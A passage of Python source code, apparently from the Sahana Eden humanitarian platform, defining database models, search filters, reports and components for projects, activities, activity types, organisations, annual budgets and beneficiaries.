append(S3SearchOptionsWidget(
name = "project_search_L1",
field = "location.location_id$L1",
location_level="L1",
cols = 3
))
#append(S3SearchOptionsWidget(
# name = "project_search_L2",
# label = T("Countries"),
# field = "location.location_id$L2",
# location_level="L2",
# cols = 3
# ))
if use_sectors:
if settings.get_ui_label_cluster():
sector = T("Cluster")
else:
sector = T("Sector")
append(S3SearchOptionsWidget(
name = "project_search_sector",
label = sector,
field = "sector.id",
options = self.org_sector_opts,
cols = 4
))
if mode_drr:
append(S3SearchOptionsWidget(
name = "project_search_hazard",
label = T("Hazard"),
field = "hazard.id",
options = self.project_hazard_opts,
help_field = self.project_hazard_helps,
cols = 4
))
if mode_3w:
append(S3SearchOptionsWidget(
name = "project_search_theme",
label = T("Theme"),
field = "theme.id",
options = self.project_theme_opts,
help_field = self.project_theme_helps,
cols = 4
))
if mode_drr:
project_hfa_opts = self.project_hfa_opts()
options = {}
#options = {None:NONE} To search NO HFA
for key in project_hfa_opts.keys():
options[key] = "HFA %s" % key
append(S3SearchOptionsWidget(
name = "project_search_hfa",
label = T("HFA"),
field = "drr.hfa",
options = options,
help_field = project_hfa_opts,
cols = 5
))
if multi_orgs:
append(S3SearchOptionsWidget(
name = "project_search_partners",
field = "partner.organisation_id",
label = T("Partners"),
cols = 3,
))
append(S3SearchOptionsWidget(
name = "project_search_donors",
field = "donor.organisation_id",
label = T("Donors"),
cols = 3,
))
project_search = S3Search(simple = simple,
advanced = advanced)
# Resource Configuration
if settings.get_project_theme_percentages():
create_next = URL(c="project", f="project",
args=["[id]", "theme"])
elif mode_task:
if settings.get_project_milestones():
create_next = URL(c="project", f="project",
args=["[id]", "milestone"])
else:
create_next = URL(c="project", f="project",
args=["[id]", "task"])
else:
# Default
create_next = None
list_fields = ["id"]
append = list_fields.append
if use_codes:
append("code")
append("name")
append("organisation_id")
if mode_3w:
append((T("Locations"), "location.location_id"))
if use_sectors:
append((T("Sectors"), "sector.name"))
if mode_drr:
append((T("Hazards"), "hazard.name"))
#append("drr.hfa")
append((T("Themes"), "theme.name"))
if multi_orgs:
table.total_organisation_amount = Field.Lazy(self.project_total_organisation_amount)
append((T("Total Funding Amount"), "total_organisation_amount"))
if multi_budgets:
table.total_annual_budget = Field.Lazy(self.project_total_annual_budget)
append((T("Total Annual Budget"), "total_annual_budget"))
append("start_date")
append("end_date")
report_fields = list_fields
report_col_default = "location.location_id"
report_fact_fields = [(field, "count") for field in report_fields]
report_fact_default = "project.organisation_id"
#report_fact_default = "theme.name"
configure(tablename,
super_entity="doc_entity",
deduplicate=self.project_project_deduplicate,
onaccept=self.project_project_onaccept,
create_next=create_next,
search_method=project_search,
list_fields=list_fields,
report_options=Storage(
search = [status_search_widget] + advanced,
rows=report_fields,
cols=report_fields,
fact=report_fact_fields,
defaults=Storage(
rows="hazard.name",
cols=report_col_default,
fact=report_fact_default,
aggregate="count",
totals=True
)
),
context = {"location": "location.location_id",
"organisation": "organisation_id",
},
realm_components = ["human_resource",
"task",
"organisation",
"activity",
"activity_type",
"annual_budget",
"beneficiary",
"location",
"milestone",
"theme_percentage",
"document",
"image",
],
update_realm=True,
)
# Reusable Field
if use_codes:
project_represent = S3Represent(lookup=tablename,
field_sep = ": ",
fields=["code", "name"])
else:
project_represent = S3Represent(lookup=tablename)
project_id = S3ReusableField("project_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db(auth.s3_accessible_query("update",
table)),
"project_project.id",
project_represent)),
represent = project_represent,
comment = S3AddResourceLink(c="project", f="project",
tooltip=T("If you don't see the project in the list, you can add a new one by clicking link 'Add Project'.")),
label = T("Project"),
ondelete = "CASCADE"
)
# Custom Methods
set_method("project", "project",
method="timeline",
action=self.project_timeline)
set_method("project", "project",
method="map",
action=self.project_map)
# Components
if multi_orgs:
# Organisations
add_component("project_organisation", project_project="project_id")
# Donors
add_component("project_organisation",
project_project=dict(
name="donor",
joinby="project_id",
filterby="role",
filterfor=[3], # Works for IFRC & DRRPP
))
# Partners
add_component("project_organisation",
project_project=dict(
name="partner",
joinby="project_id",
filterby="role",
filterfor=[2, 9], # Works for IFRC & DRRPP
))
# Sites
#add_component("project_site", project_project="project_id")
# Activities
add_component("project_activity", project_project="project_id")
# Activity Types
add_component("project_activity_type",
project_project=dict(link="project_activity_type_project",
joinby="project_id",
key="activity_type_id",
actuate="link"))
# Milestones
add_component("project_milestone", project_project="project_id")
# Outputs
add_component("project_output", project_project="project_id")
# Tasks
add_component("project_task",
project_project=dict(link="project_task_project",
joinby="project_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Annual Budgets
add_component("project_annual_budget", project_project="project_id")
# Beneficiaries
add_component("project_beneficiary", project_project="project_id")
# Hazards
add_component("project_hazard",
project_project=dict(link="project_hazard_project",
joinby="project_id",
key="hazard_id",
actuate="hide"))
# Human Resources
add_component("project_human_resource", project_project="project_id")
# Locations
add_component("project_location", project_project="project_id")
# Sectors
add_component("org_sector",
project_project=dict(link="project_sector_project",
joinby="project_id",
key="sector_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_sector_project",
project_project="project_id")
# Themes
add_component("project_theme",
project_project=dict(link="project_theme_project",
joinby="project_id",
key="theme_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_theme_project",
project_project="project_id")
# DRR
if mode_drr:
add_component("project_drr",
project_project=dict(joinby="project_id",
multiple = False))
# ---------------------------------------------------------------------
# Project Human Resources
#
define_table("project_human_resource",
project_id(empty=False),
human_resource_id(empty=False),
*s3_meta_fields()
)
configure("project_human_resource",
onvalidation=self.project_human_resource_onvalidation,
list_fields=[#"project_id",
"human_resource_id$person_id",
"human_resource_id$organisation_id",
"human_resource_id$job_title",
"human_resource_id$status"
],
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_project_id = project_id,
project_project_represent = project_represent,
project_hfa_opts = self.project_hfa_opts,
project_jnap_opts = self.project_jnap_opts,
project_pifacc_opts = self.project_pifacc_opts,
project_rfa_opts = self.project_rfa_opts,
project_theme_opts = self.project_theme_opts,
project_theme_helps = self.project_theme_helps,
project_hazard_opts = self.project_hazard_opts,
project_hazard_helps = self.project_hazard_helps,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_project_id = lambda **attr: dummy("project_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_total_organisation_amount(row):
""" Total of project_organisation amounts for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_organisation
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field]
# -------------------------------------------------------------------------
@staticmethod
def project_total_annual_budget(row):
""" Total of all annual budgets for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_annual_budget
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field] or \
current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def project_project_onaccept(form):
"""
After DB I/O tasks for Project records
"""
settings = current.deployment_settings
if settings.get_project_multiple_organisations():
# Create/update project_organisation record from the organisation_id
# (Not in form.vars if added via component tab)
vars = form.vars
id = vars.id
organisation_id = vars.organisation_id or \
current.request.post_vars.organisation_id
if organisation_id:
lead_role = settings.get_project_organisation_lead_role()
otable = current.s3db.project_organisation
query = (otable.project_id == id) & \
(otable.role == lead_role)
# Update the lead organisation
count = current.db(query).update(organisation_id = organisation_id)
if not count:
# If there is no record to update, then create a new one
otable.insert(project_id = id,
organisation_id = organisation_id,
role = lead_role,
)
# -------------------------------------------------------------------------
@staticmethod
def project_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename == "project_project":
data = item.data
table = item.table
# If we have a code, then assume this is unique, however the same
# project name may be used in multiple locations
if "code" in data and data.code:
query = (table.code.lower() == data.code.lower())
elif "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_map(r, **attr):
"""
Display a filterable set of Projects on a Map
- assumes mode_3w
- currently assumes that theme_percentages=True
@ToDo: Browse by Year
"""
if r.representation == "html" and \
r.name == "project":
T = current.T
db = current.db
s3db = current.s3db
response = current.response
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
ltable = s3db.gis_location
# Search Widget
themes_dropdown = SELECT(_multiple=True,
_id="project_theme_id",
_style="height:80px;")
append = themes_dropdown.append
table = current.s3db.project_theme
themes = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
for theme in themes:
append(OPTION(theme.name,
_value=theme.id,
_selected="selected"))
form = FORM(themes_dropdown)
# Map
# The Layer of Projects to show on the Map
# @ToDo: Create a URL to the project_polygons custom method & use that
# @ToDo: Pass through attributes that we don't need for the 1st level of mapping
# so that they can be used without a screen refresh
url = URL(f="location", extension="geojson")
layer = {"name" : T("Projects"),
"id" : "projects",
"tablename" : "project_location",
"url" : url,
"active" : True,
#"marker" : None,
}
map = current.gis.show_map(collapsed = True,
feature_resources = [layer],
)
output = dict(title = T("Projects Map"),
form = form,
map = map,
)
# Add Static JS
response.s3.scripts.append(URL(c="static",
f="scripts",
args=["S3", "s3.project_map.js"]))
response.view = "map.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_polygons(r, **attr):
"""
Export Projects as GeoJSON Polygons to view on the map
- currently assumes that theme_percentages=True
@ToDo: complete
"""
db = current.db
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
pltable = s3db.project_location
ltable = s3db.gis_location
vars = current.request.get_vars
themes = db(ttable.deleted == False).select(ttable.id,
ttable.name,
orderby = ttable.name)
# Total the Budget spent by Theme for each country
countries = {}
query = (ptable.deleted == False) & \
(tptable.project_id == ptable.id) & \
(ptable.id == pltable.project_id) & \
(ltable.id == pltable.location_id)
#if "theme_id" in vars:
# query = query & (tptable.id.belongs(vars.theme_id))
projects = db(query).select()
for project in projects:
# Only show those projects which are only within 1 country
# @ToDo
_countries = project.location_id
if len(_countries) == 1:
country = _countries[0]
if country in countries:
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
else:
name = db(ltable.id == country).select(ltable.name).first().name
countries[country] = dict(name = name)
# Init all themes to 0
for theme in themes:
countries[country][theme.id] = 0
# Add value for this record
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
query = (ltable.id.belongs(countries))
locations = db(query).select(ltable.id,
ltable.wkt)
for location in locations:
pass
# Convert to GeoJSON
output = json.dumps({})
current.response.headers["Content-Type"] = "application/json"
return output
# -------------------------------------------------------------------------
@staticmethod
def project_timeline(r, **attr):
"""
Display the project on a Simile Timeline
http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline
Currently this just displays a Google Calendar
@ToDo: Add Milestones
@ToDo: Filters for different 'layers'
@ToDo: export milestones/tasks as .ics
"""
if r.representation == "html" and r.name == "project":
appname = current.request.application
response = current.response
s3 = response.s3
calendar = r.record.calendar
# Add core Simile Code
s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % appname)
# Pass vars to our JS code
s3.js_global.append('''S3.timeline.calendar="%s"''' % calendar)
# Add our control script
if s3.debug:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.js" % appname)
else:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.min.js" % appname)
# Create the DIV
item = DIV(_id="s3timeline",
_style="height:400px;border:1px solid #aaa;font-family:Trebuchet MS,sans-serif;font-size:85%;")
output = dict(item=item)
output["title"] = current.T("Project Calendar")
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
response.view = "timeline.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_human_resource_onvalidation(form):
"""
Prevent the same hrm_human_resource record being added more than
once.
"""
# The project human resource table
hr = current.s3db.project_human_resource
# Fetch the first row that has the same project and human resource ids
query = (hr.human_resource_id == form.vars.human_resource_id) & \
(hr.project_id == form.request_vars.project_id)
row = current.db(query).select(hr.id,
limitby=(0, 1)).first()
# If we found a row we have a duplicate. Return an error to the user.
if row:
form.errors.human_resource_id = current.T("Record already exists")
return
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_opts():
"""
Provide the options for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_helps():
"""
Provide the help tooltips for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# -------------------------------------------------------------------------
@staticmethod
def project_hfa_opts():
"""
Provide the options for the HFA search filter
- defined in the model used to ensure a good load order
HFA: Hyogo Framework Agreement
"""
T = current.T
return {
1: T("HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation."),
2: T("HFA2: Identify, assess and monitor disaster risks and enhance early warning."),
3: T("HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels."),
4: T("HFA4: Reduce the underlying risk factors."),
5: T("HFA5: Strengthen disaster preparedness for effective response at all levels."),
}
# -------------------------------------------------------------------------
@staticmethod
def project_jnap_opts():
"""
Provide the options for the PIFACC search filter (currently unused)
- defined in the model used to ensure a good load order
JNAP (Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation):
applies to Cook Islands only
"""
T = current.T
return {
1: T("JNAP-1: Strategic Area 1: Governance"),
2: T("JNAP-2: Strategic Area 2: Monitoring"),
3: T("JNAP-3: Strategic Area 3: Disaster Management"),
4: T("JNAP-4: Strategic Area 4: Risk Reduction and Climate Change Adaptation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_pifacc_opts():
"""
Provide the options for the PIFACC search filter (currently unused)
- defined in the model used to ensure a good load order
PIFACC (Pacific Islands Framework for Action on Climate Change):
applies to Pacific countries only
"""
T = current.T
return {
1: T("PIFACC-1: Implementing Tangible, On-Ground Adaptation Measures"),
2: T("PIFACC-2: Governance and Decision Making"),
3: T("PIFACC-3: Improving our understanding of climate change"),
4: T("PIFACC-4: Education, Training and Awareness"),
5: T("PIFACC-5: Mitigation of Global Greenhouse Gas Emissions"),
6: T("PIFACC-6: Partnerships and Cooperation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_rfa_opts():
"""
Provide the options for the RFA search filter
- defined in the model used to ensure a good load order
RFA: applies to Pacific countries only
"""
T = current.T
return {
1: T("RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework"),
2: T("RFA2: Knowledge, Information, Public Awareness and Education"),
3: T("RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk"),
4: T("RFA4: Planning for Effective Preparedness, Response and Recovery"),
5: T("RFA5: Effective, Integrated and People-Focused Early Warning Systems"),
6: T("RFA6: Reduction of Underlying Risk Factors"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_theme_opts():
"""
Provide the options for the Theme search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_theme_helps():
"""
Provide the help tooltips for the Theme search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# =============================================================================
class S3ProjectActivityModel(S3Model):
"""
Project Activity Model
This model holds the specific Activities for Projects
- currently used in mode_task but not mode_3w
"""
names = ["project_activity",
"project_activity_id",
"project_activity_activity_type",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
settings = current.deployment_settings
mode_task = settings.get_project_mode_task()
# ---------------------------------------------------------------------
# Project Activity
#
tablename = "project_activity"
table = define_table(tablename,
# Instance
self.super_link("doc_id", "doc_entity"),
s3_datetime(),
self.project_project_id(),
Field("name",
label = T("Name"),
requires = IS_NOT_EMPTY()
),
self.project_activity_type_id(),
self.gis_location_id(
widget = S3LocationSelectorWidget(hide_address=True)
),
# Which contact is this?
# Implementing Org should be a human_resource_id
# Beneficiary could be a person_id
# Either way label should be clear
self.pr_person_id(label=T("Contact Person")),
Field("time_estimated", "double",
readable = mode_task,
writable = mode_task,
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))
),
Field("time_actual", "double",
readable = mode_task,
# Gets populated from constituent Tasks
writable = False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ACTIVITY = T("Activity")
ACTIVITY_TOOLTIP = T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'.")
ADD_ACTIVITY = T("Add Activity")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY,
title_display = T("Activity Details"),
title_list = T("Activities"),
title_update = T("Edit Activity"),
title_search = T("Search Activities"),
title_upload = T("Import Activity Data"),
title_report = T("Activity Report"),
subtitle_create = T("Add New Activity"),
label_list_button = T("List Activities"),
label_create_button = ADD_ACTIVITY,
msg_record_created = T("Activity Added"),
msg_record_modified = T("Activity Updated"),
msg_record_deleted = T("Activity Deleted"),
msg_list_empty = T("No Activities Found")
)
# Search Method
filter_widgets = [S3OptionsFilter("activity_type_id",
label=T("Type"),
represent="%(name)s",
widget="multiselect",
),
]
# Resource Configuration
report_fields = []
append = report_fields.append
append((T("Project"), "project_id"))
append((T("Activity"), "name"))
append((T("Activity Type"), "activity_type.name"))
if settings.get_project_sectors():
append((T("Sector"), "project_id$sector.name"))
append((T("Theme"), "project_id$theme.name"))
if settings.get_project_mode_drr():
append((T("Hazard"), "project_id$hazard.name"))
append((T("HFA"), "project_id$drr.hfa"))
list_fields = ["name",
"project_id",
"activity_type.name",
"comments"
]
if mode_task:
list_fields.insert(3, "time_estimated")
list_fields.insert(4, "time_actual")
append((T("Time Estimated"), "time_estimated"))
append((T("Time Actual"), "time_actual"))
#create_next = URL(c="project", f="activity",
# args=["[id]", "task"])
#else:
# create_next = URL(c="project", f="activity", args=["[id]"])
self.configure(tablename,
super_entity="doc_entity",
# Leave these workflows for Templates
#create_next=create_next,
deduplicate=self.project_activity_deduplicate,
filter_widgets = filter_widgets,
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="activity.project_id",
cols="activity.name",
fact="sum(activity.time_actual)",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
activity_id = S3ReusableField("activity_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity.id",
self.project_activity_represent,
sort=True)),
represent = self.project_activity_represent,
label = ACTIVITY,
comment = S3AddResourceLink(ADD_ACTIVITY,
c="project", f="activity",
tooltip=ACTIVITY_TOOLTIP),
ondelete = "CASCADE")
# Components
# Activity Types
add_component("project_activity_type",
project_activity=dict(link="project_activity_activity_type",
joinby="activity_id",
key="activity_type_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Beneficiaries
add_component("project_beneficiary",
project_activity=dict(link="project_beneficiary_activity",
joinby="activity_id",
key="beneficiary_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_beneficiary_activity",
project_activity="activity_id")
# Tasks
add_component("project_task",
project_activity=dict(link="project_task_activity",
joinby="activity_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Coalitions
add_component("org_group",
project_activity=dict(link="project_activity_group",
joinby="activity_id",
key="group_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_activity_group",
project_activity="activity_id")
# ---------------------------------------------------------------------
# Activity Type - Activity Link Table
#
tablename = "project_activity_activity_type"
table = define_table(tablename,
activity_id(empty=False),
self.project_activity_type_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Activity"),
msg_record_created = T("Activity Type added to Activity"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Activity"),
msg_list_empty = T("No Activity Types found for this Activity")
)
# Activity Organization
add_component("project_activity_organisation",
project_activity="activity_id")
# Pass names back to global scope (s3.*)
return dict(project_activity_id = activity_id,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_activity_id = lambda **attr: dummy("activity_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_activity_represent(id, row=None):
"""
Show activities with a prefix of the project code
"""
if row:
activity = row
db = current.db
# Fetch the project record
ptable = db.project_project
project = db(ptable.id == row.project_id).select(ptable.code,
limitby=(0, 1)).first()
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.project_activity
ptable = db.project_project
left = ptable.on(ptable.id == table.project_id)
row = db(table.id == id).select(table.name,
table.project_id,
ptable.code,
left=left,
limitby=(0, 1)).first()
try:
project = row[ptable]
activity = row[table]
except:
return current.messages.UNKNOWN_OPT
if project and project.code:
return "%s > %s" % (project.code, activity.name)
else:
return activity.name
# -------------------------------------------------------------------------
@staticmethod
def project_activity_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_activity":
return
data = item.data
if "project_id" in data and \
"name" in data:
# Match activity by project_id and name
project_id = data.project_id
name = data.name
table = item.table
query = (table.project_id == project_id) & \
(table.name == name)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectActivityTypeModel(S3Model):
"""
Project Activity Type Model
This model holds the Activity Types for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Types
"""
names = ["project_activity_type",
"project_activity_type_location",
"project_activity_type_project",
"project_activity_type_sector",
"project_activity_type_id",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Activity Types
#
tablename = "project_activity_type"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_TYPE = T("Add Activity Type")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_TYPE,
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search for Activity Type"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = ADD_ACTIVITY_TYPE,
msg_record_created = T("Activity Type Added"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type Deleted"),
msg_list_empty = T("No Activity Types Found")
)
# Reusable Fields
represent = S3Represent(lookup=tablename, translate=True)
activity_type_id = S3ReusableField("activity_type_id", table,
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity_type.id",
represent,
sort=True)),
represent = represent,
label = T("Activity Type"),
comment = S3AddResourceLink(title=ADD_ACTIVITY_TYPE,
c="project",
f="activity_type",
tooltip=T("If you don't see the type in the list, you can add a new one by clicking link 'Add Activity Type'.")),
ondelete = "SET NULL")
# Component (for Custom Form)
self.add_component("project_activity_type_sector",
project_activity_type="activity_type_id")
crud_form = S3SQLCustomForm(
"name",
# Sectors
S3SQLInlineComponent(
"activity_type_sector",
label=T("Sectors to which this Activity Type can apply"),
fields=["sector_id"],
),
)
self.configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "activity_type_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Activity Type - Sector Link Table
#
tablename = "project_activity_type_sector"
table = define_table(tablename,
activity_type_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Location Link Table
#
tablename = "project_activity_type_location"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_location_id(empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Link Table
#
tablename = "project_activity_type_project"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Project Location"),
msg_record_created = T("Activity Type added to Project Location"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Project Location"),
msg_list_empty = T("No Activity Types found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict(project_activity_type_id = activity_type_id,
)
# =============================================================================
class S3ProjectActivityOrganisationModel(S3Model):
"""
Project Activity Organisation Model
This model holds the Activity Organisations for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Organisations
"""
names = ["project_activity_organisation",
"project_activity_group",
]
def model(self):
T = current.T
define_table = self.define_table
project_activity_id = self.project_activity_id
# ---------------------------------------------------------------------
# Activities <> Organisations - Link table
#
tablename = "project_activity_organisation"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_organisation_id(empty=False),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_ORG = T("Add Activity Organisation")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_ORG,
title_display = T("Activity Organisation"),
title_list = T("Activity Organisations"),
title_update = T("Edit Activity Organisation"),
title_search = T("Search for Activity Organisation"),
subtitle_create = T("Add New Activity Organisation"),
label_list_button = T("List Activity Organisations"),
label_create_button = ADD_ACTIVITY_ORG,
msg_record_created = T("Activity Organisation Added"),
msg_record_modified = T("Activity Organisation Updated"),
msg_record_deleted = T("Activity Organisation Deleted"),
msg_list_empty = T("No Activity Organisations Found")
)
# ---------------------------------------------------------------------
# Activities <> Organisation Groups - Link table
#
tablename = "project_activity_group"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_group_id(empty=False),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectAnnualBudgetModel(S3Model):
"""
Project Budget Model
This model holds the annual budget entries for projects
"""
names = ["project_annual_budget"]
def model(self):
T = current.T
db = current.db
# ---------------------------------------------------------------------
# Annual Budgets
#
tablename = "project_annual_budget"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("year", "integer", notnull=True,
default=None, # make it current year
requires=IS_INT_IN_RANGE(1950, 3000),
label=T("Year"),
),
Field("amount", "double", notnull=True,
default=0.00,
requires=IS_FLOAT_AMOUNT(),
label=T("Amount"),
),
s3_currency(required=True),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Annual Budget"),
title_display = T("Annual Budget"),
title_list = T("Annual Budgets"),
title_update = T("Edit Annual Budget"),
title_search = T("Search Annual Budgets"),
title_upload = T("Import Annual Budget data"),
title_report = T("Report on Annual Budgets"),
subtitle_create = T("Add New Annual Budget"),
label_list_button = T("List Annual Budgets"),
label_create_button = T("New Annual Budget"),
msg_record_created = T("New Annual Budget created"),
msg_record_modified = T("Annual Budget updated"),
msg_record_deleted = T("Annual Budget deleted"),
msg_list_empty = T("No annual budgets found")
)
self.configure(tablename,
list_fields=["id",
"year",
"amount",
"currency",
]
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectBeneficiaryModel(S3Model):
"""
Project Beneficiary Model
- depends on Stats module
"""
names = ["project_beneficiary_type",
"project_beneficiary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
# Beneficiary Model needs Stats module enabling
return dict()
T = current.T
db = current.db
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Beneficiary Type
#
tablename = "project_beneficiary_type"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_beneficiary_type.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_BNF_TYPE = T("Add Beneficiary Type")
crud_strings[tablename] = Storage(
title_create = ADD_BNF_TYPE,
title_display = T("Beneficiary Type"),
title_list = T("Beneficiary Types"),
title_update = T("Edit Beneficiary Type"),
title_search = T("Search Beneficiary Types"),
subtitle_create = T("Add New Beneficiary Type"),
label_list_button = T("List Beneficiary Types"),
label_create_button = ADD_BNF_TYPE,
